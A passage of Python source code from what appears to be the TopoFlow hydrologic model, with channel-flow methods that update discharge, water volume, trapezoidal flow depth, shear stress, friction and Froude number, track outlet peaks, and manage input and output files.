        """Accumulate the total R volume over all pixels into vol_R [m^3]."""
        volume = np.double(self.R * self.da * self.dt)  # [m^3]
        if (np.size(volume) > 1):
            # R (or da) is a grid:  sum over all pixels.
            self.vol_R += np.sum(volume)
        else:
            # Scalar case:  every pixel contributes the same volume.
            self.vol_R += (volume * self.rti.n_pixels)

    #   update_R_integral()           
    #-------------------------------------------------------------------  
    def update_discharge(self):

        """Update the discharge grid, Q = u * A_wet  [m^3 s^-1].

        Q gives the flux of water _out_ of each grid cell; this
        entire amount flows into one of the 8 neighbor cells, as
        indicated by the D8 flow code.  update_flow_volume() is
        called right after this one in update() and uses the Q grid.
        """
        #---------------------------------------------------------
        # 7/15/05.  The cross-sectional area of a trapezoid is
        #   Ac = d * (w + (d * tan(theta))),
        # where w is the bottom width.  Using Ac = w * d instead
        # would give Ac=0 wherever w=0.  Angle units are radians.
        #---------------------------------------------------------
        # A_wet is initialized in initialize_computed_vars()
        # and updated in update_trapezoid_Rh().  Writing through
        # the "out" argument keeps self.Q the same array object
        # (in place, as with Q[:] =, 2/19/13), so components that
        # hold a reference to Q see the new values.
        #---------------------------------------------------------
        np.multiply( self.u, self.A_wet, self.Q )

        #----------------------------------------------------
        # Wherever depth is less than z0, assume that water
        # is not flowing and set u and Q to zero.
        # However, we also need (d gt 0) to avoid a divide
        # by zero problem, even when numerators are zero.
        #----------------------------------------------------
        # FLOWING = (d > (z0/aval))
        #*** FLOWING[self.d8.noflow_IDs] = False    ;******
        # u = (u * FLOWING)
        # Q = (Q * FLOWING)
        # d = np.maximum(d, 0.0)    ;(allow depths lt z0, if gt 0.)

    #   update_discharge()
    #-------------------------------------------------------------------
    def update_diversions(self):

        """Adjust Q and vol for point sources, sinks and canals.

        Note: This *must* be called after update_discharge() and
        before update_flow_volume().

        The Q grid stores the volume flow rate *leaving* each grid
        cell.  For sources, an extra amount leaves the cell toward
        its D8 parent; for sinks, a lesser amount leaves.  It is not
        enough to just update Q and call update_flow_volume(), since
        that would not update the volume in the cells the extra
        discharge is leaving from, so vol is updated here as well.

        NOTE(review): The body below is currently disabled by the
        early return.  It is not fully tested (but runs), and the
        Diversion vars are still computed even when the Diversions
        component is disabled, which slows things down somewhat.
        The disabled code's indentation has been normalized from
        tabs to spaces (the tab/space mix is a syntax error in
        Python 3).
        """
        #--------------------------------------------------------------
        # Note: The Channel component requests the following input
        #       vars from the Diversions component by including
        #       them in its "get_input_vars()":
        #       (1) Q_sources, Q_sources_x, Q_sources_y
        #       (2) Q_sinks,   Q_sinks_x, Q_sinks_y
        #       (3) Q_canals_out, Q_canals_out_x, Q_canals_out_y
        #       (4) Q_canals_fraction, Q_canals_in_x, Q_canals_in_y.
        #
        #       source_IDs are computed from (x,y) coordinates
        #       during initialize().  The Diversions component needs
        #       to get Q_canals_in from the Channel component.
        #--------------------------------------------------------------
        return
        ########################
        ########################

        #----------------------------------------
        # Update Q and vol due to point sources
        #----------------------------------------
        ## if (hasattr(self, 'source_IDs')):
        if (self.n_sources > 0):
            self.Q[ self.source_IDs ]   += self.Q_sources
            self.vol[ self.source_IDs ] += (self.Q_sources * self.dt)

        #--------------------------------------
        # Update Q and vol due to point sinks
        #--------------------------------------
        ## if (hasattr(self, 'sink_IDs')):
        if (self.n_sinks > 0):
            self.Q[ self.sink_IDs ]   -= self.Q_sinks
            self.vol[ self.sink_IDs ] -= (self.Q_sinks * self.dt)

        #---------------------------------------
        # Update Q and vol due to point canals
        #---------------------------------------
        ## if (hasattr(self, 'canal_in_IDs')):
        if (self.n_canals > 0):
            #-----------------------------------------------------------------
            # Q grid was just modified.  Apply the canal diversion fractions
            # to compute the volume flow rate into upstream ends of canals.
            #-----------------------------------------------------------------
            Q_canals_in = self.Q_canals_fraction * self.Q[ self.canal_in_IDs ]
            self.Q_canals_in = Q_canals_in

            #----------------------------------------------------
            # Update Q and vol due to losses at canal entrances
            #----------------------------------------------------
            self.Q[ self.canal_in_IDs ]   -= Q_canals_in
            self.vol[ self.canal_in_IDs ] -= (Q_canals_in * self.dt)

            #-------------------------------------------------
            # Update Q and vol due to gains at canal exits.
            # Diversions component accounts for travel time.
            #-------------------------------------------------
            self.Q[ self.canal_out_IDs ]   += self.Q_canals_out
            self.vol[ self.canal_out_IDs ] += (self.Q_canals_out * self.dt)

    #   update_diversions()
    #-------------------------------------------------------------------
    def update_flow_volume(self):

        #-----------------------------------------------------------
        # Notes: Must be called after update_discharge() and
        #        update_diversions().
        #-----------------------------------------------------------
        # Notes: Q   = surface discharge  [m^3/s]
        #        R   = excess precip. rate  [m/s]
        #        da  = pixel area  [m^2]
        #        dt  = channel flow timestep  [s]
        #        vol = total volume of water in pixel [m^3]
        #-----------------------------------------------------------
        step = self.dt  # [seconds]

        #----------------------------------------------------
        # Contributions over the entire grid cell from rain,
        # snowmelt, icemelt and baseflow (minus losses from
        # evaporation and infiltration) are assumed to flow
        # into the channel within the grid cell.  Note that
        # R is allowed to be negative.
        #----------------------------------------------------
        self.vol += (self.R * self.da) * step   # (in place)

        #-------------------------------------------------------------
        # Each grid cell passes flow to *one* downstream neighbor,
        # but multiple cells can flow toward a given cell, so a cell
        # ID may occur in d8.p1 and d8.p2, etc.  Loop over the eight
        # D8 directions instead of writing out eight if-blocks.
        #-------------------------------------------------------------
        for k in range(1, 9):
            if getattr(self.d8, 'p%d_OK' % k):
                parents = getattr(self.d8, 'p%d' % k)
                sources = getattr(self.d8, 'w%d' % k)
                self.vol[ parents ] += (step * self.Q[ sources ])

        #----------------------------------------------------
        # Subtract the amount that flows out to D8 neighbor
        #----------------------------------------------------
        self.vol -= (self.Q * step)  # (in place)

        #--------------------------------------------------------
        # While R can be positive or negative, the surface flow
        # volume must always be nonnegative.  This also ensures
        # that the flow depth is nonnegative.
        #--------------------------------------------------------
        np.maximum( self.vol, 0.0, self.vol )  # (in place)

    #   update_flow_volume
    #-------------------------------------------------------------------
    def update_flow_depth(self):

        """Update flow depth, d, from the current water volume, vol.

        Inverts the trapezoidal geometry relation vol = Ac * ds,
        with Ac = d * (w + d*tan(theta)), solving the quadratic for
        d and discarding the negative root.  Cells that are overbank
        (d > d_bankfull) or whose top width exceeds the grid-cell
        width are converted to rectangular channels of width d8.dw
        (self.width and self.angle are modified in place).  Depths
        at d8.noflow_IDs (e.g. edges) are set to zero, and self.d is
        clamped to be nonnegative.  Also sets the self.d_is_pos and
        self.d_is_neg masks used by update_friction_factor() and
        update_froude_number().
        """
        #-----------------------------------------------------------
        # Notes: 7/18/05.  Modified to use the equation for volume
        #        of a trapezoidal channel:  vol = Ac * ds, where
        #        Ac=d*[w + d*tan(t)], and to solve the resulting
        #        quadratic (discarding neg. root) for new depth, d.

        #        8/29/05.  Now original ds is used for subsurface
        #        flow and there is a ds_chan which can include a
        #        sinuosity greater than 1.  This may be especially
        #        important for larger pixel sizes.

        #        Removed (ds > 1) here which was only meant to
        #        avoid a "divide by zero" error at pixels where
        #        (ds eq 0).  This isn't necessary since the
        #        Flow_Lengths function in utils_TF.pro never
        #        returns a value of zero.
        #----------------------------------------------------------
        #        Modified to avoid double where calls, which
        #        reduced cProfile run time for this method from
        #        1.391 to 0.644.  (9/23/14)
        #----------------------------------------------------------
        # Commented this out on (2/18/10) because it doesn't
        #           seem to be used anywhere now.  Checked all
        #           of the Channels components.
        #----------------------------------------------------------        
        # self.d_last = self.d.copy()

        #-----------------------------------        
        # Make some local aliases and vars
        #-----------------------------------------------------------
        # Note: angles were read as degrees & converted to radians
        #-----------------------------------------------------------
        # NOTE(review): d aliases self.d here, but may be rebound
        # to a *new* array below; self.d itself is only updated by
        # the final np.maximum(d, 0.0, self.d) call.
        #-----------------------------------------------------------
        d = self.d
        width = self.width  ###
        angle = self.angle
        SCALAR_ANGLES = (np.size(angle) == 1)
        
        #------------------------------------------------------
        # (2/18/10) New code to deal with case where the flow
        #           depth exceeds a bankfull depth.
        #           For now, d_bankfull is hard-coded.
        #
        #           CHANGE Manning's n here, too?
        #------------------------------------------------------
        d_bankfull = 4.0  # [meters]
        ################################
        wb = (self.d > d_bankfull)  # (array of True or False)
        self.width[ wb ]  = self.d8.dw[ wb ]
        if not(SCALAR_ANGLES):
            self.angle[ wb ] = 0.0
     
#         w_overbank = np.where( d > d_bankfull )
#         n_overbank = np.size( w_overbank[0] )
#         if (n_overbank != 0):
#             width[ w_overbank ] = self.d8.dw[ w_overbank ]
#             if not(SCALAR_ANGLES): angle[w_overbank] = 0.0

        #------------------------------------------------------
        # (2/18/10) New code to deal with case where the top
        #           width exceeds the grid cell width, dw.
        #------------------------------------------------------
        # NOTE(review): top_width uses sin(self.angle) while the
        # cross-section formula uses tan(); confirm the intended
        # bank-angle convention.  Also note self.width may have
        # just been modified by the overbank block above.
        #------------------------------------------------------            
        top_width = width + (2.0 * d * np.sin(self.angle))
        wb = (top_width > self.d8.dw)  # (array of True or False)
        self.width[ wb ] = self.d8.dw[ wb ]
        if not(SCALAR_ANGLES):
            self.angle[ wb ] = 0.0
                    
#         wb = np.where(top_width > self.d8.dw)
#         nb = np.size(w_bad[0])
#         if (nb != 0):
#             width[ wb ] = self.d8.dw[ wb ]
#             if not(SCALAR_ANGLES): angle[ wb ] = 0.0

        #----------------------------------
        # Is "angle" a scalar or a grid ?
        #----------------------------------
        # Rectangular channel (angle == 0): d = vol / (w * ds).
        # Trapezoid: solve d*(w + d*tan(a)) * ds = vol for d.
        #----------------------------------
        if (SCALAR_ANGLES):
            if (angle == 0.0):    
                d = self.vol / (width * self.d8.ds)
            else:
                denom = 2.0 * np.tan(angle)
                arg   = 2.0 * denom * self.vol / self.d8.ds
                arg  += width**(2.0)
                d     = (np.sqrt(arg) - width) / denom
        else:
            #-----------------------------------------------------
            # Pixels where angle is 0 must be handled separately
            # to avoid dividing by tan(0) = 0.
            #-----------------------------------------------------
            w1 = ( angle == 0 )  # (arrays of True or False)
            w2 = np.invert( w1 )
            #-----------------------------------
            A_top = width[w1] * self.d8.ds[w1]          
            d[w1] = self.vol[w1] / A_top
            #-----------------------------------               
            denom  = 2.0 * np.tan(angle[w2])
            arg    = 2.0 * denom * self.vol[w2] / self.d8.ds[w2]
            arg   += width[w2]**(2.0)
            d[w2] = (np.sqrt(arg) - width[w2]) / denom

            #-----------------------------------------------------
            # Pixels where angle is 0 must be handled separately
            #-----------------------------------------------------
#             wz   = np.where( angle == 0 )
#             nwz  = np.size( wz[0] )
#             wzc  = np.where( angle != 0 )
#             nwzc = np.size( wzc[0] )
#             
#             if (nwz != 0):
#                 A_top = width[wz] * self.d8.ds[wz]
#                 ## A_top = self.width[wz] * self.d8.ds_chan[wz]            
#                 d[wz] = self.vol[wz] / A_top
#             
#             if (nwzc != 0):    
#                 term1  = 2.0 * np.tan(angle[wzc])
#                 arg    = 2.0 * term1 * self.vol[wzc] / self.d8.ds[wzc]
#                 arg   += width[wzc]**(2.0)
#                 d[wzc] = (np.sqrt(arg) - width[wzc]) / term1

        #------------------------------------------
        # Set depth values on edges to zero since
        # they become spikes (no outflow) 7/15/06
        #------------------------------------------    
        d[ self.d8.noflow_IDs ] = 0.0

        #------------------------------------------------
        # 4/19/06.  Force flow depth to be positive ?
        #------------------------------------------------
        # This seems to be needed with the non-Richards
        # infiltration routines when starting with zero
        # depth everywhere, since all water infiltrates
        # for some period of time.  It also seems to be
        # needed more for short rainfall records to
        # avoid a negative flow depth error.
        #------------------------------------------------
        # 7/13/06.  Still needed for Richards method
        #------------------------------------------------
        ## self.d = np.maximum(d, 0.0)
        # Writes the clamped result into self.d in place (d may be
        # a different array here in the scalar-angle case).
        np.maximum(d, 0.0, self.d)  # (2/19/13, in place)

        #-------------------------------------------------        
        # Find where d <= 0 and save for later (9/23/14)
        #-------------------------------------------------
        self.d_is_pos = (self.d > 0)
        self.d_is_neg = np.invert( self.d_is_pos )
        
    #   update_flow_depth
    #-------------------------------------------------------------------
    def update_free_surface_slope(self):

        #-----------------------------------------------------------
        # Notes: Flow directions are assumed fixed even though the
        #        free surface is changing.
        #-----------------------------------------------------------
        drop = self.d - self.d[ self.d8.parent_IDs ]
        self.S_free[:] = self.S_bed + (drop / self.d8.ds)

        #--------------------------------------------
        # Negative slopes are deliberately kept:
        # they decelerate flow in the dynamic wave
        # case and produce backwater effects, so we
        # do NOT clamp with np.maximum(S_free, 0).
        #--------------------------------------------

    #   update_free_surface_slope()
    #-------------------------------------------------------------------
    def update_shear_stress(self):

        """Update bed shear stress, tau, so it can be shared.

        Uses the depth-slope product: tau = rho_H2O * g * d * S,
        where S is the bed slope for the kinematic wave case and
        the free-surface slope otherwise.

        Fix: the `slope = self.S_bed` line was tab-indented while
        the rest of the method uses spaces; that mix is a TabError
        in Python 3.  Indentation normalized, behavior unchanged.
        """
        if (self.KINEMATIC_WAVE):
            slope = self.S_bed
        else:
            slope = self.S_free
        self.tau[:] = self.rho_H2O * self.g * self.d * slope

    #   update_shear_stress()
    #-------------------------------------------------------------------
    def update_shear_speed(self):

        #--------------------------------------------------------
        # Notes: Shear (friction) velocity, u* = sqrt(tau/rho),
        #        computed here so it can be shared.
        #--------------------------------------------------------
        ratio = self.tau / self.rho_H2O
        np.sqrt( ratio, self.u_star )   # (in place)

    #   update_shear_speed()
    #-------------------------------------------------------------------
    def update_trapezoid_Rh(self):

        #-------------------------------------------------------------
        # Notes: Hydraulic radius, Rh = A_wet / P_wet, of a channel
        #        that (1) has a bed width wb >= 0 (0 = triangular),
        #        (2) has a bank angle theta (0 = rectangular), and
        #        (3) is filled with water to depth d.  Units of wb
        #        and d are meters; angles are already in radians
        #        (they were read as degrees and converted earlier;
        #        a 9/9/14 bug fix removed a double conversion).
        #-------------------------------------------------------------
        # NB!    wb should never be zero, so P_wet can never be 0,
        #        which would produce a NaN (divide by zero).
        #-------------------------------------------------------------
        depth   = self.d        # (local synonyms)
        bottom  = self.width    # (trapezoid bottom width)
        #--------------------------------------------------------
        # A_wet = d * (wb + d*tan(theta));  the wetted perimeter
        # adds the two sloping banks of length d / cos(theta).
        #--------------------------------------------------------
        overhang = depth * np.tan( self.angle )
        wet_area = depth * (bottom + overhang)
        wet_perim = bottom + (np.float64(2) * depth / np.cos(self.angle) )

        #---------------------------------------------------
        # At noflow_IDs (e.g. edges) P_wet may be zero, so
        # substitute 1 there to avoid "divide by zero".
        #---------------------------------------------------
        wet_perim[ self.d8.noflow_IDs ] = np.float64(1)
        hyd_radius = (wet_area / wet_perim)

        #------------------------------------
        # Force edge pixels to have Rh = 0.
        # This will make u = 0 there also.
        #------------------------------------
        hyd_radius[ self.d8.noflow_IDs ] = np.float64(0)

        self.Rh[:]    = hyd_radius
        self.A_wet[:] = wet_area   ## (Now shared: 9/9/14)
        self.P_wet[:] = wet_perim  ## (Now shared: 9/9/14)

    #   update_trapezoid_Rh()
    #-------------------------------------------------------------------
    def update_friction_factor(self):    

        #---------------------------------------------------------
        # Note:  f  = half of the Fanning friction factor
        #        d  = flow depth [m]
        #        z0 = roughness length
        #        g  = gravitational constant [m/s^2]
        #---------------------------------------------------------
        #        Law of the wall:
        #        kappa = 0.41 = von Karman's constant
        #        aval  = 0.48 = integration constant
        #        smoothness = (aval / z0) * d
        #        f = (kappa / log(smoothness))^2
        #        tau_bed = rho_w * f * u^2 = rho_w * g * d * S
        #
        #        d, S, and z0 can be arrays.
        #
        #        To make default z0 correspond to default
        #        Manning's n, can use this approximation:
        #        z0 = a * (2.34 * sqrt(9.81) * n / kappa)^6
        #        For n=0.03 this gives z0 = 0.011417, but for
        #        n=0.3 it gives z0 = 11417.413 (11.4 km!), so the
        #        approximation only holds over a range of values.
        #---------------------------------------------------------
        # Reuse the depth-sign masks computed in
        # update_flow_depth(); pos = (d > 0), neg = (d <= 0).
        # This makes f=0 and du=0 where (d <= 0).
        #---------------------------------------------------------
        pos = self.d_is_pos
        neg = self.d_is_neg

        #-----------------------------
        # Compute f for Manning case
        #-----------------------------
        if (self.MANNING):
            n_sq = self.nval ** np.float64(2)
            self.f[ pos ] = self.g * (n_sq[pos] / (self.d[pos] ** self.one_third))
            self.f[ neg ] = np.float64(0)

        #---------------------------------
        # Compute f for Law of Wall case
        #---------------------------------
        if (self.LAW_OF_WALL):
            #------------------------------------------------
            # Clip smoothness at 1.1 so the log stays
            # positive.  Should issue a warning if this
            # clipping is actually used.
            #------------------------------------------------
            smoothness = (self.aval / self.z0val) * self.d
            np.maximum(smoothness, np.float64(1.1), smoothness)  # (in place)
            self.f[ pos ] = (self.kappa / np.log(smoothness[pos])) ** np.float64(2)
            self.f[ neg ] = np.float64(0)

        #---------------------------------------------
        # We could share the Fanning friction factor
        #---------------------------------------------
        ### self.fanning = (np.float64(2) * self.f)

    #   update_friction_factor()       
    #-------------------------------------------------------------------
    def update_velocity(self):

        """Placeholder: warn that no velocity method is active.

        Does nothing unless overridden by a subclass implementing a
        particular method of computing velocity (kinematic,
        diffusive or dynamic wave).

        Fix: converted the Python-2-only print statement to the
        parenthesized form, which behaves identically for a single
        argument in both Python 2 and Python 3.
        """
        print("Warning: update_velocity() method is inactive.")

        # print('KINEMATIC WAVE =', self.KINEMATIC_WAVE)
        # print('DIFFUSIVE WAVE =', self.DIFFUSIVE_WAVE)
        # print('DYNAMIC WAVE   =', self.DYNAMIC_WAVE)

    #   update_velocity()
    #-------------------------------------------------------------------
    def update_velocity_on_edges(self):

        #----------------------------------------
        # Force edge pixels to have u = 0.
        # A large slope (around 1) flowing into
        # a small slope leads to a negative
        # velocity otherwise.
        #----------------------------------------
        edges = self.d8.noflow_IDs
        self.u[ edges ] = np.float64(0)

    #   update_velocity_on_edges()
    #-------------------------------------------------------------------
    def update_froude_number(self):

        #----------------------------------------------------------
        # Notes: Froude number Fr = u / sqrt(g * d), computed so
        # it can be shared.  Reusing the precomputed depth masks
        # (instead of two where() calls) cut cProfile time from
        # 0.644 s to 0.121 s (9/23/14), and avoids dividing by
        # zero where the depth is zero.
        #----------------------------------------------------------
        pos = self.d_is_pos
        neg = self.d_is_neg

        self.froude[ pos ] = self.u[pos] / np.sqrt( self.g * self.d[pos] )
        self.froude[ neg ] = np.float64(0)

    #   update_froude_number()
    #-------------------------------------------------------------
    def update_outlet_values(self):

        #-----------------------------------------------------
        # Save computed values at the outlet, which are used
        # by the TopoFlow driver.
        #-----------------------------------------------------
        # Q_outlet, u_outlet, d_outlet and f_outlet are 0-d
        # numpy arrays ("mutable scalars") so that changes are
        # seen by other components holding a reference.  To
        # preserve the reference we must assign via fill().
        #-----------------------------------------------------
        for var in ('Q', 'u', 'd', 'f'):
            value = getattr(self, var)[ self.outlet_ID ]
            getattr(self, var + '_outlet').fill( value )

    #   update_outlet_values()
    #-------------------------------------------------------------
    def update_peak_values(self):

        #-----------------------------------------------------
        # Track peak outlet values and their times.  Peaks
        # and times are 0-d numpy arrays ("mutable scalars"),
        # so new values must be assigned via fill() to keep
        # references held by other components valid.
        #-----------------------------------------------------
        triples = (('Q_outlet', 'Q_peak', 'T_peak'),
                   ('u_outlet', 'u_peak', 'Tu_peak'),
                   ('d_outlet', 'd_peak', 'Td_peak'))
        for out_name, peak_name, time_name in triples:
            out_val = getattr(self, out_name)
            peak    = getattr(self, peak_name)
            if (out_val > peak):
                peak.fill( out_val )
                getattr(self, time_name).fill( self.time_min )  # (time to peak)

    #   update_peak_values()
    #-------------------------------------------------------------
    def update_Q_out_integral(self):

        #--------------------------------------------------------
        # Accumulate the total outflow volume at the outlet.
        # "volume_out" was renamed "vol_Q" for consistency with
        # vol_P, vol_SM, vol_IN, vol_ET, etc. (5/18/12)
        #--------------------------------------------------------
        self.vol_Q += (self.dt * self.Q_outlet)   ## Experiment: 5/19/12.

    #   update_Q_out_integral()
    #-------------------------------------------------------------
    def update_mins_and_maxes(self, REPORT=False):

        """Update the running min and max of Q, u, and d.

        Only the grid interior (rows 1..ny-2, cols 1..nx-2) is
        scanned, because edge values are always zero and would make
        the mins meaningless.

        The stored extrema (self.Q_min, self.Q_max, etc.) are mutable
        0-d arrays; .fill() updates them in place so that references
        held by other components remain valid.

        REPORT: if True, print the updated min/max values.
        """
        #--------------------------------------------
        # Exclude edges where mins are always zero.
        #--------------------------------------------
        nx = self.nx
        ny = self.ny
        # Slice [1:(n - 2)+1] covers indices 1 through n-2, inclusive.
        Q_min = self.Q[1:(ny - 2)+1,1:(nx - 2)+1].min()
        Q_max = self.Q[1:(ny - 2)+1,1:(nx - 2)+1].max()
        #-------------------------------------------------
        u_min = self.u[1:(ny - 2)+1,1:(nx - 2)+1].min()
        u_max = self.u[1:(ny - 2)+1,1:(nx - 2)+1].max()
        #-------------------------------------------------
        d_min = self.d[1:(ny - 2)+1,1:(nx - 2)+1].min()
        d_max = self.d[1:(ny - 2)+1,1:(nx - 2)+1].max()

        #-------------------------------------------------
        # (2/6/13) fill() preserves "mutable scalars" that
        # can be accessed as refs by other components.
        # (Plain assignment would rebind to an immutable
        # scalar and break those references.)
        #-------------------------------------------------
        if (Q_min < self.Q_min):
            self.Q_min.fill( Q_min )
        if (Q_max > self.Q_max):
            self.Q_max.fill( Q_max )
        #------------------------------
        if (u_min < self.u_min):
            self.u_min.fill( u_min )
        if (u_max > self.u_max):
            self.u_max.fill( u_max )
        #------------------------------
        if (d_min < self.d_min):
            self.d_min.fill( d_min )
        if (d_max > self.d_max):
            self.d_max.fill( d_max )

        if (REPORT):
            print 'In channels_base.update_mins_and_maxes():'
            print '(dmin, dmax) =', self.d_min, self.d_max
            print '(umin, umax) =', self.u_min, self.u_max
            print '(Qmin, Qmax) =', self.Q_min, self.Q_max
            print ' '
            
    #   update_mins_and_maxes()
    #-------------------------------------------------------------------
    def check_flow_depth(self):

        """Check that all flow depths are finite and non-negative.

        Returns True if the depth grid self.d is OK; otherwise prints
        an error report and returns False.  A bad depth usually means
        the time step self.dt is too large.
        """
        d  = self.d
        dt = self.dt

        #------------------------------------------------
        # Are all flow depths finite and non-negative ?
        #------------------------------------------------
        wbad = np.where( np.logical_or( d < 0.0, np.logical_not(np.isfinite(d)) ) )
        nbad = np.size( wbad[0] )
        if (nbad == 0):
            return True

        dmin = d[wbad].min()
        star_line = '*******************************************'

        # Message fixed for consistency with check_flow_velocity():
        # the condition above also catches NaN, not just negatives.
        msg = [ star_line,
               'ERROR: Simulation aborted.', ' ',
               'Negative or NaN depth found: ' + str(dmin),
               'Time step may be too large.',
               'Time step:      ' + str(dt) + ' [s]', ' ']
        for line in msg:
            print(line)

        #--------------------------------------------
        # If not too many, report the first bad cell
        #--------------------------------------------
        if (nbad < 30):
            brow = wbad[0][0]
            bcol = wbad[1][0]
            crstr = str(bcol) + ', ' + str(brow)
            msg = ['(Column, Row):  ' + crstr,
                   'Flow depth:     ' + str(d[brow, bcol])]
            for line in msg:
                print(line)

        print(star_line)
        print(' ')
        return False

    #   check_flow_depth
    #-------------------------------------------------------------------
    def check_flow_velocity(self):

        """Check that all flow velocities are finite and non-negative.

        Returns True if the velocity grid self.u is OK; otherwise
        prints an error report and returns False.  A bad velocity
        usually means the time step self.dt is too large.
        """
        u  = self.u
        dt = self.dt

        #------------------------------------------------
        # Are all velocities finite and non-negative ?
        #------------------------------------------------
        wbad = np.where( np.logical_or( u < 0.0, np.logical_not(np.isfinite(u)) ) )
        nbad = np.size( wbad[0] )
        if (nbad == 0):
            return True

        umin = u[wbad].min()
        star_line = '*******************************************'
        msg = [ star_line,
               'ERROR: Simulation aborted.', ' ',
               'Negative or NaN velocity found: ' + str(umin),
               'Time step may be too large.',
               'Time step:      ' + str(dt) + ' [s]', ' ']
        for line in msg:
            print(line)

        #--------------------------------------------
        # If not too many, report the first bad cell
        #--------------------------------------------
        if (nbad < 30):
            brow = wbad[0][0]
            bcol = wbad[1][0]
            crstr = str(bcol) + ', ' + str(brow)
            msg = ['(Column, Row):  ' + crstr,
                   'Velocity:       ' + str(u[brow, bcol])]
            for line in msg:
                print(line)

        print(star_line)
        print(' ')
        return False


    #   check_flow_velocity
    #-------------------------------------------------------------------  
    def open_input_files(self):

        """Open all channel-process input files.

        File names are first made absolute via prepend_directory()
        (which handles self.in_directory); one file unit attribute
        (e.g. self.slope_unit) is then set per input variable.
        nval and z0val are only opened for the roughness option in
        use (MANNING vs. LAW_OF_WALL).
        """
        in_files = ['slope_file', 'nval_file', 'z0val_file',
                    'width_file', 'angle_file', 'sinu_file', 'd0_file']
        self.prepend_directory( in_files, INPUT=True )

        self.slope_unit = model_input.open_file(self.slope_type, self.slope_file)
        if (self.MANNING):
            self.nval_unit = model_input.open_file(self.nval_type, self.nval_file)
        if (self.LAW_OF_WALL):
            self.z0val_unit = model_input.open_file(self.z0val_type, self.z0val_file)

        # Remaining inputs are unconditional; open them uniformly.
        for name in ('width', 'angle', 'sinu', 'd0'):
            ftype = getattr(self, name + '_type')
            fname = getattr(self, name + '_file')
            setattr(self, name + '_unit', model_input.open_file(ftype, fname))

        # os.chdir( start_dir )

    #   open_input_files()        
    #-------------------------------------------------------------------  
    def read_input_files(self):

        """Read the next value of each time-varying channel input.

        If read_next() returns None (EOF), the previously stored
        value is kept.  nval and z0val are only read for the
        roughness option in use, and their min/max are cached.

        BUG FIX: comparisons use "is not None" instead of "!= None".
        read_next() may return a NumPy array, and (array != None) is
        an elementwise comparison whose truth value is ambiguous.
        """
        #---------------------------------------------------
        # The flow codes are always a grid, size of DEM.
        # NB! model_input.py also has a read_grid() function.
        #---------------------------------------------------
        rti = self.rti

        #-------------------------------------------------------
        # All grids are assumed to have a data type of Float32.
        #-------------------------------------------------------
        slope = model_input.read_next(self.slope_unit, self.slope_type, rti)
        if (slope is not None): self.slope = slope

        if (self.MANNING):
            nval = model_input.read_next(self.nval_unit, self.nval_type, rti)
            if (nval is not None):
                self.nval     = nval
                self.nval_min = nval.min()
                self.nval_max = nval.max()

        if (self.LAW_OF_WALL):
            z0val = model_input.read_next(self.z0val_unit, self.z0val_type, rti)
            if (z0val is not None):
                self.z0val     = z0val
                self.z0val_min = z0val.min()
                self.z0val_max = z0val.max()

        width = model_input.read_next(self.width_unit, self.width_type, rti)
        if (width is not None): self.width = width

        angle = model_input.read_next(self.angle_unit, self.angle_type, rti)
        if (angle is not None):
            #-----------------------------------------------
            # Convert bank angles from degrees to radians.
            #-----------------------------------------------
            self.angle = angle * self.deg_to_rad  # [radians]

        sinu = model_input.read_next(self.sinu_unit, self.sinu_type, rti)
        if (sinu is not None): self.sinu = sinu

        d0 = model_input.read_next(self.d0_unit, self.d0_type, rti)
        if (d0 is not None): self.d0 = d0

    #   read_input_files()     
    #-------------------------------------------------------------------  
    def close_input_files(self):

        """Close every input file opened by open_input_files().

        Scalar-type inputs have no open file unit, so they are
        skipped.  nval and z0val units exist only for the roughness
        option in use (MANNING vs. LAW_OF_WALL).
        """
        names = ['slope']
        if (self.MANNING):
            names.append('nval')
        if (self.LAW_OF_WALL):
            names.append('z0val')
        names.extend(['width', 'angle', 'sinu', 'd0'])

        for name in names:
            if (getattr(self, name + '_type') != 'Scalar'):
                getattr(self, name + '_unit').close()

    #   close_input_files()       
    #-------------------------------------------------------------------  
    def update_outfile_names(self):

        """Prepend out_directory to every output file name.

        Covers the grid-stack (gs) and time-series (ts) files for
        each of the four output variables: Q, u, d, f.
        """
        prefix = self.out_directory
        for var in ('Q', 'u', 'd', 'f'):
            gs_attr = var + '_gs_file'
            ts_attr = var + '_ts_file'
            setattr(self, gs_attr, prefix + getattr(self, gs_attr))
            setattr(self, ts_attr, prefix + getattr(self, ts_attr))

    #   update_outfile_names()
    #-------------------------------------------------------------------  
    def bundle_output_files(self):

        """Bundle per-variable output file info into self.out_files.

        Bundling lets a single open_output_files() /
        close_output_files() pair live in BMI_base.py.  (9/21/14)
        gs = grid stack, ts = time series, ps = profile series.

        NOTE: still not wired up (the call in open_output_files() is
        commented out); "get_long_name()" and a new version of
        "get_var_units()" are not yet defined.

        BUG FIX: dict keys must be string literals; the original used
        bare names (var_name, save_gs, ...), which raises NameError.
        """
        self.out_files = [
            {'var_name': 'Q',
             'save_gs': self.SAVE_Q_GRIDS,  'gs_file': self.Q_gs_file,
             'save_ts': self.SAVE_Q_PIXELS, 'ts_file': self.Q_ts_file,
             'long_name': get_long_name('Q'),
             'units_name': get_var_units('Q')},
            #-----------------------------------------------------------
            {'var_name': 'u',
             'save_gs': self.SAVE_U_GRIDS,  'gs_file': self.u_gs_file,
             'save_ts': self.SAVE_U_PIXELS, 'ts_file': self.u_ts_file,
             'long_name': get_long_name('u'),
             'units_name': get_var_units('u')},
            #-----------------------------------------------------------
            {'var_name': 'd',
             'save_gs': self.SAVE_D_GRIDS,  'gs_file': self.d_gs_file,
             'save_ts': self.SAVE_D_PIXELS, 'ts_file': self.d_ts_file,
             'long_name': get_long_name('d'),
             'units_name': get_var_units('d')},
            #-----------------------------------------------------------
            {'var_name': 'f',
             'save_gs': self.SAVE_F_GRIDS,  'gs_file': self.f_gs_file,
             'save_ts': self.SAVE_F_PIXELS, 'ts_file': self.f_ts_file,
             'long_name': get_long_name('f'),
             'units_name': get_var_units('f')} ]
                        
    #   bundle_output_files
    #-------------------------------------------------------------------  
    def open_output_files(self):

        """Open netCDF output files for every variable whose SAVE
        flag is set: grid-stack files (gs) and time-series files
        (ts) for Q, u, d, and f.
        """
        model_output.check_netcdf()
        self.update_outfile_names()

        #-------------------------------------------------------
        # One (var_name, long_name, units_name) triple per
        # output variable, reused for both gs and ts files.
        #-------------------------------------------------------
        var_info = ( ('Q', 'volumetric_discharge',       'm^3/s'),
                     ('u', 'mean_channel_flow_velocity', 'm/s'),
                     ('d', 'max_channel_flow_depth',     'm'),
                     ('f', 'friction_factor',            'none') )

        #--------------------------------------
        # Open new files to write grid stacks
        #--------------------------------------
        for (vname, lname, units) in var_info:
            if getattr(self, 'SAVE_' + vname.upper() + '_GRIDS'):
